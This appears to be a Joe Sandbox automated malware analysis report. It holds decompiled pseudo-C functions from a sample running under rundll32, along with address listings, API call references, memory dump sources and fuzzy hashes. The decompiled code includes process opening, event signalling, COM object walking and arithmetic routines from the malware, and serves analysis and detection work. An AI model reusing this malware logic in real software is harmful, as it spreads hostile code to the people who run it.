0x00c22d8f
0x00c22d90
0x00c22d90
0x00c22d93
0x00000000
0x00000000
0x00000000
0x00c22d93
0x00c22d5d
0x00c22da4
0x00c22da8
0x00c22e82
0x00c22e84
0x00c22e84
0x00c22e85
0x00c22e88
0x00000000
0x00c22e88
0x00c22dc2
0x00c22dc6
0x00c22e7e
0x00000000
0x00c22e7e
0x00c22dcc
0x00c22dcf
0x00c22dd3
0x00c22dd9
0x00c22ddc
0x00c22e74
0x00c22e74
0x00000000
0x00c22e7a
0x00c22de7
0x00c22df0
0x00c22e04
0x00c22e0b
0x00c22e20
0x00c22e26
0x00c22e2e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c22e30
0x00c22e30
0x00c22e30
0x00c22e37
0x00c22e3f
0x00000000
0x00000000
0x00c22e41
0x00c22e4a
0x00000000
0x00000000
0x00000000
0x00c22e4c
0x00c22e4e
0x00c22e51
0x00c22e51
0x00c22e54
0x00c22e58
0x00c22e5b
0x00c22e61
0x00c22e64
0x00c22e6b
0x00000000
0x00c22de7
0x00c22d62
0x00c22d6d
0x00c22d70
0x00c22d72
0x00c22d72
0x00c22d75
0x00c22d77
0x00000000
0x00c22d77
0x00c22d51
0x00c22d97
0x00c22d9c
0x00c22d9e
0x00c22d9e
0x00c22da1
0x00c22da1
0x00000000

APIs

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

lstrcpy.KERNEL32(69B25F45,00000020), ref: 00C22E0B
lstrcat.KERNEL32(69B25F45,00000020), ref: 00C22E20
lstrcmp.KERNEL32(00000000,69B25F45), ref: 00C22E37
lstrlen.KERNEL32(69B25F45), ref: 00C22E5B

Strings

, xrefs: 00C22DA4

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 4f5e4328f8dcc31b100a6618fab04589607dde2b1108b068185592d16d48d07a
Instruction ID: a1b2cf2721cd4f7b031a3fb4e46dc114bf2f26dd0cb264d25b57f6bb28cb9dec
Opcode Fuzzy Hash: 4f5e4328f8dcc31b100a6618fab04589607dde2b1108b068185592d16d48d07a
Instruction Fuzzy Hash: E851C231A00228FBDF20DF99D884BADBBB6FF45301F15805AEC649B611C770AB42DB80

Uniqueness

Uniqueness Score: -1.00%

Function 7034CA1A, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 7034CA32

Part of subcall function 70341970: HeapFree.KERNEL32(00000000,00000000,?,7033F811,00000000), ref: 70341986
Part of subcall function 70341970: GetLastError.KERNEL32(?,?,7033F811,00000000), ref: 70341998

_free.LIBCMT ref: 7034CA44
_free.LIBCMT ref: 7034CA56
_free.LIBCMT ref: 7034CA68
_free.LIBCMT ref: 7034CA7A

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cddf7b3d06e62ec0f889e5153a2e9413a1a28b49b36ef5f817522c5732b11fc0
Instruction ID: 300f12d41566bb637c2fc46aba5a5f64ec3f749f5b3a1561b46e22b4f9a45beb
Opcode Fuzzy Hash: cddf7b3d06e62ec0f889e5153a2e9413a1a28b49b36ef5f817522c5732b11fc0
Instruction Fuzzy Hash: 81F04F73520604EBC680DBA9E8D5D2E37EDAE006507752809F05FDF660C730FC8086B8

Uniqueness

Uniqueness Score: -1.00%

Function 00C21DFA, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C21DFA(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xc2a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xc2a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xc2a2b0 = _t6;
				 *0xc2a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xc2a2ac = _t7;
				if(_t7 == 0) {
					 *0xc2a2ac =  *0xc2a2ac | 0xffffffff;
				}
				return 0;
			}

0x00c21e02
0x00c21e0a
0x00c21e0f
0x00000000
0x00c21e5c
0x00c21e11
0x00c21e19
0x00c21e59
0x00000000
0x00c21e59
0x00c21e1b
0x00c21e20
0x00c21e32
0x00c21e37
0x00c21e3d
0x00c21e45
0x00c21e4a
0x00c21e4c
0x00c21e4c
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00C2686A,?,?,00000001), ref: 00C21E02
GetVersion.KERNEL32(?,00000001), ref: 00C21E11
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00C21E20
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00C21E3D
GetLastError.KERNEL32(?,00000001), ref: 00C21E5C

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: c843a0d8f17ac4146c425e1bf341d952ac25918705193447bbbdf76b3824a2e7
Instruction ID: 183829c77dcab90e969496e970b373b26825faaad35d7a633bdda8144d97166a
Opcode Fuzzy Hash: c843a0d8f17ac4146c425e1bf341d952ac25918705193447bbbdf76b3824a2e7
Instruction Fuzzy Hash: EDF03A70A64316EFD7308F65AC4DB1E3BB5E718B40F158419E91AC59E0D7718442DF1A

Uniqueness

Uniqueness Score: -1.00%

Function 00C2627E, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00C262BF
SysFreeString.OLEAUT32(00000000), ref: 00C263A2

Part of subcall function 00C24598: SysAllocString.OLEAUT32(00C292B0), ref: 00C245E8

SafeArrayDestroy.OLEAUT32(?), ref: 00C263F6
SysFreeString.OLEAUT32(?), ref: 00C26404

Part of subcall function 00C2708C: Sleep.KERNEL32(000001F4), ref: 00C270D4

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: dfe134256f6f9a8a5b994a3806591220c7ff74e18c7bf4888fefd49431e12508
Instruction ID: 7a70a520c0f22a1df7e2d814db512c68d78d3707f39773aae9d5052a4330b496
Opcode Fuzzy Hash: dfe134256f6f9a8a5b994a3806591220c7ff74e18c7bf4888fefd49431e12508
Instruction Fuzzy Hash: 21513276900219EFCB11DFA4D8C499EB7B6FF88300B148869E656DB620D731AD46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C24598, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00C24598(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xc2a2d4; // 0x449d5a8
					_t5 = _t102 + 0xc2b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xc292b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xc2a2d4; // 0x449d5a8
												_t28 = _t108 + 0xc2b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xc2a2d4; // 0x449d5a8
														_t33 = _t78 + 0xc2b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00c2459d
0x00c245a6
0x00c245a7
0x00c245ab
0x00c245b1
0x00c245b7
0x00c245c0
0x00c245c6
0x00c245d0
0x00c245d2
0x00c245d8
0x00c245dd
0x00c245e8
0x00c245f0
0x00c245f3
0x00c24716
0x00c245f9
0x00c245f9
0x00c24606
0x00c2460c
0x00c24612
0x00c24616
0x00c2461c
0x00c24629
0x00c2462d
0x00c24633
0x00c24636
0x00c2463c
0x00c24642
0x00c24648
0x00c2464b
0x00c2464e
0x00c24654
0x00c2465d
0x00c24663
0x00c24664
0x00c24667
0x00c24668
0x00c24669
0x00c24671
0x00c24672
0x00c24673
0x00c24675
0x00c24679
0x00c2467d
0x00000000
0x00000000
0x00c24683
0x00c2468c
0x00c24692
0x00c2469c
0x00c246a0
0x00c246a2
0x00c246af
0x00c246b3
0x00c246bb
0x00c246c0
0x00c246d2
0x00c246d4
0x00c246da
0x00c246da
0x00c246e3
0x00c246e3
0x00c246e5
0x00c246eb
0x00c246eb
0x00c246ee
0x00c246f4
0x00c246f7
0x00c24700
0x00000000
0x00000000
0x00000000
0x00c24700
0x00c24654
0x00c2464e
0x00c24636
0x00c24706
0x00c24706
0x00c2470c
0x00c2470c
0x00c24712
0x00c24712
0x00c2471b
0x00c24721
0x00c24721
0x00c245dd
0x00c2472a

APIs

SysAllocString.OLEAUT32(00C292B0), ref: 00C245E8
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00C246CA
SysFreeString.OLEAUT32(00000000), ref: 00C246E3
SysFreeString.OLEAUT32(?), ref: 00C24712

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 22e80bdb59fda31159374904a6e78dc25fec38cc4159a159dcca17a7dc192b51
Instruction ID: af68158a9b3dbb9b9bf75586c3980f90ddce27f729c1759ab5fe00f506b50677
Opcode Fuzzy Hash: 22e80bdb59fda31159374904a6e78dc25fec38cc4159a159dcca17a7dc192b51
Instruction Fuzzy Hash: 09517F75D0052AEFCB14DFA8D888DAEF7B9FF89705B104594E915EB210DB31AD02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2472B, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00C2472B(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00C270EC(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00C23954(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00C26136(_t101,  &_v428, _a8, _t96 - _t81);
					E00C26136(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00C23954(_t101,  &E00C2A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00C23954(_a16, _a4);
						E00C22E9B(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00C27DDC();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00C27DD6();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00C221FA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00C25C5B(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00C2584E(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00C2A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00c2472e
0x00c2473a
0x00c24740
0x00c24745
0x00c24749
0x00c248bb
0x00c248bf
0x00c248bf
0x00c2474f
0x00c24753
0x00c24759
0x00c2475a
0x00c24765
0x00c2476b
0x00c24770
0x00c24773
0x00c2478d
0x00c2479c
0x00c247a8
0x00c247b2
0x00c247b7
0x00c247b9
0x00c247bc
0x00c24873
0x00c24879
0x00c2488a
0x00c2489d
0x00c248b3
0x00000000
0x00c248b8
0x00c247c5
0x00c247cc
0x00c247d0
0x00c247d6
0x00c247d8
0x00c247da
0x00c247dc
0x00c247de
0x00c247e8
0x00c247ed
0x00c247ef
0x00c247f1
0x00c247f2
0x00c247f3
0x00c247f4
0x00c247fb
0x00c24802
0x00c24805
0x00c24805
0x00c247d2
0x00c247d2
0x00c247d2
0x00c2480d
0x00c24815
0x00c24821
0x00c24826
0x00c24826
0x00c2482b
0x00000000
0x00000000
0x00c2482d
0x00c24830
0x00c2483d
0x00000000
0x00000000
0x00c2483f
0x00c2483f
0x00c2484c
0x00c24826
0x00c2482b
0x00000000
0x00000000
0x00000000
0x00c2482b
0x00c24856
0x00c24859
0x00c2485c
0x00c24863
0x00c24863
0x00c24870
0x00000000
0x00c24870
0x00c2475c
0x00c24760
0x00c24761
0x00c24763
0x00000000
0x00000000
0x00000000
0x00c24763
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00C247DE
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00C247F4
memset.NTDLL ref: 00C2489D
memset.NTDLL ref: 00C248B3

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: cd724f8b0133f9b2effc0e0b66bcb3f6c712b02ae6a8b23db8c4e7ae5bc94127
Instruction ID: 6372cb44128528a0f84e27d6199f4d23ac19344e201f5c24f91b310567a688aa
Opcode Fuzzy Hash: cd724f8b0133f9b2effc0e0b66bcb3f6c712b02ae6a8b23db8c4e7ae5bc94127
Instruction Fuzzy Hash: 2A412531A00229AFDB14DF68EC41BEE7775EF46710F004129F919A7681EBB0AE54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 703453F6, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 703454C6
_free.LIBCMT ref: 703454EF
SetEndOfFile.KERNEL32(00000000,70340784,00000000,?,?,?,?,?,?,?,?,70340784,?,00000000), ref: 70345521
GetLastError.KERNEL32(?,?,?,?,?,?,?,70340784,?,00000000), ref: 7034553D

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: b75fb47cccee0e03c156dfc4dc71c184c1237bcacc40787098dac18c2be4432b
Instruction ID: d8ed2e699cf9492d3c50434ddc5eaa5a9d2c9690296288934b02d44c230490a7
Opcode Fuzzy Hash: b75fb47cccee0e03c156dfc4dc71c184c1237bcacc40787098dac18c2be4432b
Instruction Fuzzy Hash: 99411732D006419FD7125BB68C02BBD3BFAAF45261F212116FC16EF392DB35E9918B61

Uniqueness

Uniqueness Score: -1.00%

Function 00C24BAC, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00C24BAC(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xc2a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xc2a2d4; // 0x449d5a8
				_t3 = _t8 + 0xc2b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00C23D0E(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xc2a2f8, 1, 0, _t30);
					E00C213CC(_t30);
				}
				_t12 =  *0xc2a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00C22102() == 0) {
						_t28 =  *0xc2a120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00C2663C(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00C22F12(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00c24bad
0x00c24bb4
0x00c24bbe
0x00c24bc2
0x00c24bc8
0x00c24bd5
0x00c24bdc
0x00c24be0
0x00c24bf2
0x00c24bf4
0x00c24bf4
0x00c24bf9
0x00c24c00
0x00c24c0b
0x00c24c21
0x00c24c25
0x00c24c27
0x00c24c2c
0x00c24c2c
0x00c24c39
0x00c24c3d
0x00c24c41
0x00000000
0x00000000
0x00c24c4f
0x00c24c53
0x00000000
0x00000000
0x00c24c53
0x00c24c3d
0x00000000
0x00c24c55
0x00c24c55
0x00c24c55
0x00c24c5b
0x00c24c5d
0x00c24c5d
0x00c24c67
0x00c24c6b
0x00c24c7d
0x00c24c7d
0x00c24c81
0x00c24c87
0x00c24c87
0x00c24c8a
0x00c24c8c
0x00c24c8f
0x00c24c8f
0x00c24c96
0x00c24c9c
0x00c24c9c

APIs

Part of subcall function 00C23D0E: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,050C9CD0,7742C740,00C2454B,?,69B25F44,E8FA7DD7,00000000,?,?,?,00C2454B), ref: 00C23D44
Part of subcall function 00C23D0E: lstrcpy.KERNEL32(00000000,00000000), ref: 00C23D68
Part of subcall function 00C23D0E: lstrcat.KERNEL32(00000000,00000000), ref: 00C23D70

CreateEventA.KERNEL32(00C2A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00C2757A,?,?,?), ref: 00C24BEB

Part of subcall function 00C213CC: RtlFreeHeap.NTDLL(00000000,00000000,00C220F3,00000000,00000000,?,00000000,?,?,?,?,?,00C268A9,00000000,?,00000001), ref: 00C213D8

WaitForSingleObject.KERNEL32(00000000,00004E20,00C2757A,00000000,?,00000000,?,00C2757A,?,?,?,?,?,?,?,00C2519C), ref: 00C24C49
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00C2757A,?,?,?), ref: 00C24C77
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00C2757A,?,?,?), ref: 00C24C8F

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 08747c625b1be9fb836c8d821a1cccb74806e2bc255919769e59fb92d1850a7d
Instruction ID: cb8ade79146ac43d9bf44827580f858173811251cbdec1dd22bbaf86b6b5ea40
Opcode Fuzzy Hash: 08747c625b1be9fb836c8d821a1cccb74806e2bc255919769e59fb92d1850a7d
Instruction Fuzzy Hash: 23210832512736ABC7355B6CBC84B5E77EDEF58750F050224FE26ABA90DB71CD014690

Uniqueness

Uniqueness Score: -1.00%

Function 00C274CB, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00C274CB(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00C27770(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00C23625(_t23);
						}
					}
					return _t38;
				}
				if(E00C2249F(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xc2a2f8, 1, 0,  *0xc2a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00C23D85(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00C25448(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00C2243E(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00C24BAC( &_v32, _t39);
					goto L13;
				}
			}

0x00c274cb
0x00c274d8
0x00c274de
0x00c274df
0x00c274e0
0x00c274e1
0x00c274e2
0x00c274e6
0x00c274f2
0x00c274f6
0x00c2757e
0x00c2757e
0x00c27581
0x00c27583
0x00c2758b
0x00c27591
0x00c27594
0x00c27594
0x00c27591
0x00c2759f
0x00c2759f
0x00c27509
0x00c2750b
0x00c2750b
0x00c27522
0x00c27526
0x00c27529
0x00c27534
0x00c2753b
0x00c2753b
0x00c27547
0x00c27548
0x00c27556
0x00c2754a
0x00c2754a
0x00c2754b
0x00c2754c
0x00c2754d
0x00c2754e
0x00c2754f
0x00c2754f
0x00c2755b
0x00c27560
0x00c27562
0x00c27564
0x00c27564
0x00c2756b
0x00000000
0x00c2756d
0x00c2756d
0x00c2757a
0x00000000
0x00c2757a

APIs

CreateEventA.KERNEL32(00C2A2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,00C2519C,?,00000001), ref: 00C2751C
SetEvent.KERNEL32(00000000,?,?,?,?,00C2519C,?,00000001,00C24579,00000002,?,?,00C24579), ref: 00C27529
Sleep.KERNEL32(00000BB8,?,?,?,?,00C2519C,?,00000001,00C24579,00000002,?,?,00C24579), ref: 00C27534
CloseHandle.KERNEL32(00000000,?,?,?,?,00C2519C,?,00000001,00C24579,00000002,?,?,00C24579), ref: 00C2753B

Part of subcall function 00C23D85: WaitForSingleObject.KERNEL32(00000000,?,?,?,00C2755B,?,00C2755B,?,?,?,?,?,00C2755B,?), ref: 00C23E5F
